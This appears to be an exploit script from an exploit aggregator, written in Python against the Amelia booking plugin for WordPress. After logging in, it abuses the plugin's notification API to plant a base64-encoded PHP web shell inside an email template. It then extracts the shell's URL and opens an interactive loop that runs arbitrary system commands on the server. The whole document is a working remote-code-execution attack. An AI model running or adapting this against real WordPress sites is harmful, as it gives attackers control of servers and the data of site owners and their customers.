Share
## https://sploitus.com/exploit?id=WPEX-ID:3CF05815-9B74-4491-A935-D69A0834146C
import requests
import base64
BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"
def login(id, pw) :
sess = requests.Session()
sess.post(
BASE_URL + "/wp-login.php",
data = {
'log': id,
'pwd': pw,
'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
'testcookie': '1'
}
).text
return sess
def exploit(sess) :
SHELLCODE = b"<?php echo(passthru($_POST['qerogram']));?>"
payload = r'''{"id":1,"name":"customer_appointment_approved","customName":null,"status":"enabled","type":"email","entity":"appointment","time":null,"timeBefore":null,"timeAfter":null,"sendTo":"customer","subject":"%service_name% Appointment Approved",'''
payload += r'''"content":"<p>Dear <strong><img src=\"data:image/php;,''' + base64.b64encode(SHELLCODE).decode()
payload += r'''\">%customer_full_name%</strong>,</p><p><br></p><p>You have successfully scheduled <strong>%service_name%</strong> appointment with <strong>%employee_full_name%</strong>. We are waiting you at <strong>%location_address% </strong>on <strong>%appointment_date_time%</strong>.</p><p><br></p><p>Thank you for choosing our company,</p><p><strong>%company_name%</strong></p>","translations":null,"entityIds":null,"sendOnlyMe":null}'''
res = sess.post(
f"{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/1",
data = payload,
headers = {"Content-Type": "application/json;charset=UTF-8"}
)
SHELL_ADDR = res.json()['data']['notification']['content']
SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find('src="')+5:]
SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find('"')]
while True :
cmd = input("$ ")
if cmd.lower() == "exit" or cmd.lower() == "quit" :
break
res = sess.post(
SHELL_ADDR,
data = {"qerogram" : cmd}
)
print(res.text)
sess = login(id,pw)
exploit(sess)